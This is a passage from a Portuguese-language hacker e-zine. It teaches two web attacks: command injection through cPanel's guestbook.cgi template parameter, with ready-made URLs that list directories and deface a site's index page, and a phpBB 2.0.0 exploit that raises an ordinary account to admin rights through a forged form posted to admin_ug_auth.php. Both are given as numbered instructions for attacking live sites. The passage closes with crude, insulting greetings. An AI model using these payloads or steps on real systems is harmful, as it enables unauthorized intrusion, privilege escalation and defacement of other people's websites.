Cpanel, uma vull interesante, pois você vasculha um linux pelo seu navegador IE ( isso mesmo Internet Explorer ) Primeiro como se acha a vull. Você tera a disposição o scaner do arplhmd ( sempre ele ) Achou...... Bem vamos lah.... Eu gosto de colocar uma frase em cada linha.. Ai a zine fica maior... ultima vez..... Pronto...... Você devera colocar assim no navegador: www.sitebugado.com/cgi-sys/guestbook.cgi?user=cpanel&template=|os comandos linux| EX: www.sitebugado.com/cgi-sys/guestbook.cgi?user=cpanel&template=|ls /home| Assim ira listar todos os arquivos do diretorio Home MAis e para wonar????? Vamos supor que o site esteja no diretorio /home/asbl/www/ Você vai no navegador e coloca www.sitebugado.com/cgi-sys/guestbook.cgi?user=cpanel&template=|echo Acid_c0de ensinado Cpanel #kpcrime aew > /home/asbl/www/index.htm| Sakaram??????!!!!??Assim ira aparecer na index do site Acid_c0de ensinado Cpanel #kpcrime aew Facinho, mais nao é facil achar sites com essa vull. Mais nao desanimem :) | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ PHPBB 2.00 ]=- hehe aqui nois dnovo!! com mais iuma vull extinta mais vale a pena saber, quem sabe nao surgem novos sites com essa vull intao é melhor estarmos preparados.Então vamos la..... Você podera pegar o que eu melhorei em http://www.kpcrime.kit.net/phpbb_pl.zip Você tera que criar um html com esse codigo e seguir as instruçoes abaixo. ------------------------------------------------------------------------------------------------- root_a_phpBB_2.0.0.pl 




Users: 
    User ID:  
 
 






-------------------------------------------------------------------------------------------------
Instruções de Uso
------------------
1. Vá ao site que você deseja mudar as permissões de user 
   para admin usando um navedor. 
2. Ache o local de diretório básico do site para o Script, 
   i.e. se a página principal fosse http://www.server.com/phpBB2/index.php 
   o local de diret¢rio básico seria http://www.server.com/phpBB2 
   e então edite a fonte do exploit HTML deste Script de forma que a linha 
   escrita - form method="post" action="http://www.base_url_Aqui.com/admin/admin_ug_auth.php" - 
   seja o local correto á página de admin. ( mude somente o nome da pagina, ou seja,
   somente substitua "www.base_url_Aqui.com" pelo link da pagina, por exemplowww.paginaphpbb2.com)
3. Va ate "Memberlist" (normalmente localizado ao topo 
   com o resto dos links...) 
4. Procure em "Memberlist"  a conta específica que você deseja 
   mudar as permissões para admin, e clique no nome da conta para trazer 
   para cima o perfil. 
5. Anote direito o número ao término da URL da página que você esta 
   atualmente é onde diz "u =? ".  (este é o valor notado, se foi apagado algum
   usuário da Pilha, então o próximo ao seu número ou entao
   nome de usuário da lista de membros debaixo da coluna de ``#´´ será seu 
   verdadeiro número de usuário, caso contrário não vai ser. - ( Então não se pode 
   confiar no numero de ID.) 
6. Clique em "logout" no forum (se você não fazer isto 
   Nao ira funcionar, e lhe dará uma mensagem de permissão negada) 
7. Digite o seu número de usuário na caixa de ID abaixo , e clique em submit... 

Nota: Depois de clicar em submit você adquirirá uma página que lhe pede log in, 
simplesmente ignore isto e então va fazer loggon no forum de 
modo habitual. - Se tiver êxito, haverá um link ao fundo de toda declaração 
da página no forum "Go To Administration Panel"...
e opções adicionais aparecerão na tela quando você estiver vendo uma linha 
específica para  permitir a editar ou apagar posts no site etc. 

Falow valeu pela atenção, pois acho que você foi o unico besta que leu essas merda. E ate a proxima.....

=========================================================================================


                                              |
                                             |.|
                                             |.|
                                            |\./|
                                            |\./|
                             .              |\./|              .
                             \^.\          |\\.//|          /.^/
                              \--.|\       |\\.//|       /|.--/
                                \--.| \    |\\.//|    / |.--/
                                 \---.|\    |\./|    /|.---/
                                    \--.|\  |\./|  /|.--/
                                       \ .\  |.|  /. /
                             _ -_^_^_^_-  \ \\ // /  -_^_^_^_-_
                                 - -/_/_/- ^ ^|  ^ ^ -\_\_\- -
                                              |
                                              |
                                -=[          End             ]=-

 Bem aqui termino essa zine, espero que gostem pq se nao gostaram que se foda.......
 Se alguem quiser postar alguma coisa aqui, um tuto que vc tenha feito e talz kernel_panic@hacker.am

  = Greetz =

H4F43L - Boquinha de acerola segundo seus amigos
__k__ - Muléki chato do __k__raio
Paiste - 18 anos e a mãe dele poe ele de castigo ainda
Gary_sagara - Fundou ou uns 20 knais so para ter bastante @
Sc0n - lol
ph3r0m0n3 - "to aqui fazendo o deface das crinança"
Evolui - Pedofilo renomado	
R41l4nd3r - "tenho 18 anos e ainda nao comi nenhuma mina :/ "
Code_black_ninja - 10 anos de IRC e ainda nao sabe mexer no chanserv
UNderCow - tem a doença da vaca loka
D14bl0_ - Medium espiritual
Faisca_sk8 - cowboy de rodeo ( nao estou brincando :| )


 tambem agradeço aos knais #thb_clan  - #System_crack - #Ir4dex - #f3pn - #NHC - #BugTravel 



 ______EOF_________